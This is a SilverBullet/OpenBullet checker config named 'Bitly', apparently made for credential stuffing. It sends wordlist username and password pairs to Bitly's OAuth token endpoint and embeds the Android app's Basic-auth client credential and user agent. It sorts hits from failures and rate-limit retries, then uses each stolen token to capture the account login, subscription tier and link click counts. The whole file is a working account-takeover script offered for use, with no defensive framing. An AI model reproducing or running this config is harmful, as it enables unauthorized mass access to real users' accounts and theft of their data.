[SETTINGS]
{
  "Name": "Bitly",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Bitly",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#/oauth/access_token REQUEST POST "https://api-ssl.bitly.com/oauth/access_token" EncodeContent=TRUE 
  CONTENT "username=<USER>&password=<PASS>&platform=android&grant_type=password" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "X-2fa-Support: default" 
  HEADER "Authorization: Basic NzM3YzA2YWFlNzk1MGFiYzMxMDJlMDc2NWU5ZGZjYWEyODcwOGNlOTpiNzE2MjViNWI5MjI5ZTJmY2JiMTMyYzgyYjBlYTM2YTZhYWQ0MmIw" 
  HEADER "User-Agent: Bitly/2.9.5 (com.bitly.app; build: 1277; Android 29)" 

#200_OK? KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "40" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "20" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "429" 

#access_token PARSE "<SOURCE>" JSON "access_token" -> VAR "X" 

#/v4/user REQUEST GET "https://api-ssl.bitly.com/v4/user" 
  
  HEADER "User-Agent: Bitly/2.9.5 (com.bitly.app; build: 1277; Android 29)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <X>" 

#login PARSE "<SOURCE>" JSON "login" CreateEmpty=FALSE -> CAP "User" 

#default_group_guid PARSE "<SOURCE>" JSON "default_group_guid" -> VAR "Z" 

#/v4/organizations REQUEST GET "https://api-ssl.bitly.com/v4/organizations" 
  
  HEADER "Authorization: Bearer <X>" 
  HEADER "User-Agent: Bitly/2.9.5 (com.bitly.app; build: 1277; Android 29)" 

#tier_display_name PARSE "<SOURCE>" JSON "tier_display_name" CreateEmpty=FALSE -> CAP "Tier" 

#/bitlinks REQUEST GET "https://api-ssl.bitly.com/v4/groups/<Z>/bitlinks" 
  
  HEADER "Authorization: Bearer <X>" 
  HEADER "User-Agent: Bitly/2.9.5 (com.bitly.app; build: 1277; Android 29)" 

#id PARSE "<SOURCE>" JSON "id" Recursive=TRUE -> VAR "ID" "bitlink_id=" "" 

#bitLinks FUNCTION Replace ", " "&" "<ID>" -> VAR "BL" 

#bitLinks FUNCTION Replace "/" "%2F" "<BL>" -> VAR "BL" 

#/v4/clicks? REQUEST GET "https://api-ssl.bitly.com/v4/clicks?<BL>" 
  
  HEADER "Authorization: Bearer <X>" 
  HEADER "User-Agent: Bitly/2.9.5 (com.bitly.app; build: 1277; Android 29)" 

#Clicks PARSE "<SOURCE>" LR ",\"clicks\":" "}" Recursive=TRUE CreateEmpty=FALSE -> CAP "Clicks" 

#Clicks? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<Clicks>" DoesNotContain "1" 
    KEY "<Clicks>" DoesNotContain "2" 
    KEY "<Clicks>" DoesNotContain "3" 
    KEY "<Clicks>" DoesNotContain "4" 
    KEY "<Clicks>" DoesNotContain "5" 
    KEY "<Clicks>" DoesNotContain "6" 
    KEY "<Clicks>" DoesNotContain "7" 
    KEY "<Clicks>" DoesNotContain "8" 
    KEY "<Clicks>" DoesNotContain "9" 
    KEY "<Tier>" EqualTo "Free" 
  KEYCHAIN Custom "FREE" OR 
    KEY "TOO_MANY_LOOKUP_PARAMETERS" 

